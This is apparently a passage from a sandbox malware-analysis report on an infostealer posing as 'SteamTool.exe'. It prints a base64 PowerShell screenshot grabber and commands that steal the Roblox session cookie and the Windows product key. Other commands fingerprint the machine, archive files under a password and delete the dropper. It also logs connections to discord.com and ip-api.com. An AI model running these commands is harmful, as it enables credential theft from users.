QAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kwoszjqd\kwoszjqd.cmdline"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7956.tmp" "c:\Users\Admin\AppData\Local\Temp\kwoszjqd\CSCD74F2CA13F724827AB474720BEDBC65D.TMP"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI19482\rar.exe a -r -hp"akbar" "C:\Users\Admin\AppData\Local\Temp\8vhJp.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI19482\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI19482\rar.exe a -r -hp"akbar" "C:\Users\Admin\AppData\Local\Temp\8vhJp.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\SteamTool.exe""
C:\Windows\system32\PING.EXE
ping localhost -n 3
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.0.748445370\169528534" -parentBuildID 20230214051806 -prefsHandle 1736 -prefMapHandle 1728 -prefsLen 22074 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1e3befc2-2d8f-4102-a5bc-b267144c65a0} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 1816 20433b0d458 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.1.389190633\337776833" -parentBuildID 20230214051806 -prefsHandle 2320 -prefMapHandle 2316 -prefsLen 22110 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f5bb1ba6-808b-4d7b-8277-c4770804a302} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 2340 20426e88a58 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.2.819946973\1928095735" -childID 1 -isForBrowser -prefsHandle 2888 -prefMapHandle 2584 -prefsLen 22148 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e6271fbe-96d8-41e0-b320-9e5c28bf84f8} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 2576 204363e0658 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.3.486355482\1999395079" -childID 2 -isForBrowser -prefsHandle 3568 -prefMapHandle 3552 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f417d15d-9f42-4b0c-b0a4-be702c19b38f} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 3580 20439612258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.4.703764317\586603824" -childID 3 -isForBrowser -prefsHandle 5172 -prefMapHandle 5160 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6a37683f-7ec0-4946-b173-b8c2419ad4c3} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 5184 2043a842258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.5.1354394484\436679997" -childID 4 -isForBrowser -prefsHandle 5388 -prefMapHandle 5384 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {59f66a56-0660-46f7-8aa1-23d7d3c0ea97} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 5396 2043be0fd58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.6.220556986\862648564" -childID 5 -isForBrowser -prefsHandle 5204 -prefMapHandle 5200 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e7dc6ff1-9ced-4578-82c5-aca8b4bd412c} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 5068 2043be0eb58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.7.1303166205\787404001" -parentBuildID 20230214051806 -prefsHandle 5352 -prefMapHandle 2712 -prefsLen 27695 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {aee7b66a-df1b-4e0b-a277-c0a87f9c6ea6} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 3536 2043be2ba58 rdd
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.8.1631979949\227202197" -childID 6 -isForBrowser -prefsHandle 5916 -prefMapHandle 5912 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5a39d7a4-98ac-4e8e-9cb2-225bfe987d5f} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 5924 2043be2d558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.9.912800860\2035668290" -childID 7 -isForBrowser -prefsHandle 10004 -prefMapHandle 10056 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {19b35418-c287-4446-a3d4-d39416f16766} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 4860 2043de55958 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.10.1431782564\1272254683" -childID 8 -isForBrowser -prefsHandle 9988 -prefMapHandle 9992 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f7cba82e-2ba5-452d-9612-286980f1ea03} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 9980 2043de56258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.11.37375899\275871677" -childID 9 -isForBrowser -prefsHandle 9744 -prefMapHandle 9740 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5e029b9f-ab40-42a2-88c1-239e7883304b} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 9592 2043df18858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.12.1912395626\1838205560" -childID 10 -isForBrowser -prefsHandle 9448 -prefMapHandle 9444 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b94b8d18-b5f4-49bf-9698-646c8a2c7788} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 9460 2043df15558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.13.323643159\1878532" -childID 11 -isForBrowser -prefsHandle 9396 -prefMapHandle 9392 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {08df8404-2674-4391-9bad-da96e58472ef} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 9608 2043db7f258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.14.940211301\1807040294" -childID 12 -isForBrowser -prefsHandle 9144 -prefMapHandle 9148 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dbcae252-4da9-4977-a64c-3747ac11ee2d} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 9136 2043a91f858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.15.56004043\1951153233" -childID 13 -isForBrowser -prefsHandle 8984 -prefMapHandle 8976 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {32f3fdb4-233a-481a-bba8-ea92827eed51} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 8996 2043a921958 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.16.153059500\587934032" -childID 14 -isForBrowser -prefsHandle 8800 -prefMapHandle 8796 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8b490f80-6829-423a-b60c-6f25064d03e7} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 8812 2043a922858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.17.1395375548\817965282" -childID 15 -isForBrowser -prefsHandle 8508 -prefMapHandle 8504 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fb598075-b8a7-4da5-b754-089c868cc982} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 8520 2043eddc458 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.18.633255734\2098280710" -childID 16 -isForBrowser -prefsHandle 8184 -prefMapHandle 8168 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {19912f2a-9e3b-48fd-98d7-56c42f53dc18} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 8144 2043f28d558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.19.1519957282\307534974" -childID 17 -isForBrowser -prefsHandle 8032 -prefMapHandle 8028 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ac3c008c-7d23-424b-bf0c-cf945117fbba} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 8040 2043f176558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.20.158851460\400396987" -childID 18 -isForBrowser -prefsHandle 7840 -prefMapHandle 7836 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2221b79a-0288-45e2-9517-a724dfbebfbf} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 7852 2043f28d858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.21.1087977969\1427423548" -childID 19 -isForBrowser -prefsHandle 5184 -prefMapHandle 5672 -prefsLen 27960 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e667ab0d-4c7c-438f-bd67-ada106789516} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 7532 20432e0d258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.22.1407537576\1547823098" -childID 20 -isForBrowser -prefsHandle 7448 -prefMapHandle 8936 -prefsLen 28039 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {27ff48e4-6a6d-4c8e-86f5-451db7ea75f8} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 7456 2043b227858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.23.202984230\616584407" -childID 21 -isForBrowser -prefsHandle 7384 -prefMapHandle 7500 -prefsLen 28039 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4ae9b76d-1949-483c-8492-bf1ae27ed0da} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 7400 2043b229058 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.24.252673244\639056828" -childID 22 -isForBrowser -prefsHandle 7048 -prefMapHandle 7076 -prefsLen 28039 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {32087b98-5c3f-481e-bd48-766f4b000ad3} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 7072 20432e25458 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.25.877541999\1579235465" -childID 23 -isForBrowser -prefsHandle 6984 -prefMapHandle 6776 -prefsLen 31299 -prefMapSize 235121 -jsInitHandle 1288 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9280e93f-3f53-4ede-bc62-4670b55e36fc} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 7004 20439364b58 tab
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | blank-3iour.in | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 162.159.135.232:443 | discord.com | tcp |
| N/A | 127.0.0.1:50066 | tcp | |
| US | 8.8.8.8:53 | getpocket.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | shavar.services.mozilla.com | udp |
| US | 8.8.8.8:53 | push.services.mozilla.com | udp |
| US | 52.33.96.36:443 | shavar.prod.mozaws.net | tcp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 34.120.5.221:443 | prod.pocket.prod.cloudops.mozgcp.net | tcp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | tcp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | tcp |
| US | 34.107.243.93:443 | push.services.mozilla.com | tcp |
| US | 34.107.243.93:443 | push.services.mozilla.com | tcp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | udp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | udp |
| US | 34.107.243.93:443 | push.services.mozilla.com | udp |
| N/A | 127.0.0.1:50072 | tcp | |
| US | 104.20.3.235:80 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 172.67.21.227:443 | dsp.vlitag.com | tcp |
| US | 172.67.21.227:443 | dsp.vlitag.com | udp |
| US | 172.67.21.227:443 | dsp.vlitag.com | udp |
| US | 8.8.8.8:53 | c.amazon-adsystem.com | udp |
| US | 104.22.59.199:443 | dsp.vlitag.com | tcp |
| US | 104.22.59.199:443 | dsp.vlitag.com | tcp |
| US | 104.22.59.199:443 | dsp.vlitag.com | tcp |
| GB | 142.250.187.202:443 | imasdk.googleapis.com | tcp |
| US | 104.22.59.199:443 | dsp.vlitag.com | udp |
| US | 104.22.59.199:443 | dsp.vlitag.com | udp |
| US | 8.8.8.8:53 | 202.187.250.142.in-addr.arpa | udp |
| GB | 142.250.187.202:443 | imasdk.googleapis.com | udp |
| FR | 52.222.149.52:443 | d23sp3kzv1t6m5.cloudfront.net | tcp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | tcp |
| US | 18.245.194.122:443 | c.amazon-adsystem.com | tcp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | tcp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | udp |
| US | 18.245.194.122:443 | c.amazon-adsystem.com | tcp |
| US | 151.101.65.229:443 | cdn.jsdelivr.net | tcp |
| DE | 141.101.120.10:443 | px.vliplatform.com | tcp |
| DE | 141.101.120.10:443 | px.vliplatform.com | tcp |
| DE | 141.101.120.10:443 | px.vliplatform.com | tcp |
| DE | 141.101.120.10:443 | px.vliplatform.com | tcp |
| DE | 141.101.120.10:443 | px.vliplatform.com | tcp |
| DE | 141.101.120.10:443 | px.vliplatform.com | tcp |
| US | 18.245.175.156:443 | aax.amazon-adsystem.com | tcp |
| US | 18.245.175.156:443 | aax.amazon-adsystem.com | tcp |
| US | 18.245.175.156:443 | aax.amazon-adsystem.com | tcp |
| US | 151.101.65.229:443 | cdn.jsdelivr.net | udp |
| US | 18.245.175.156:443 | aax.amazon-adsystem.com | tcp |
| US | 18.245.175.156:443 | aax.amazon-adsystem.com | tcp |
| US | 18.245.175.156:443 | aax.amazon-adsystem.com | tcp |
| DE | 141.101.120.10:443 | px.vliplatform.com | udp |
| FR | 52.84.174.75:443 | config.aps.amazon-adsystem.com | tcp |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| US | 216.239.32.36:443 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | shb.richaudience.com | udp |
| US | 8.8.8.8:53 | useast.quantumdex.io | udp |
| US | 8.8.8.8:53 | prebid-eu.creativecdn.com | udp |
| US | 8.8.8.8:53 | ib.adnxs.com | udp |
| US | 172.67.75.241:443 | script.4dex.io | tcp |
| US | 8.8.8.8:53 | script.4dex.io | udp |
| US | 104.22.36.96:443 | useast.quantumdex.io | tcp |
| US | 104.22.36.96:443 | useast.quantumdex.io | tcp |
| DE | 18.157.128.118:443 | api.cmp.inmobi.com | tcp |
| US | 172.67.75.241:443 | script.4dex.io | tcp |
| US | 104.18.22.145:443 | cadmus.script.ac | tcp |
| US | 8.8.8.8:53 | 52.149.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.65.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.120.101.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.175.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.174.84.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.75.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.36.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.128.157.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cadmus.script.ac | udp |
| DE | 178.63.241.79:443 | shb.richaudience.com | tcp |
| DE | 178.63.241.79:443 | shb.richaudience.com | tcp |
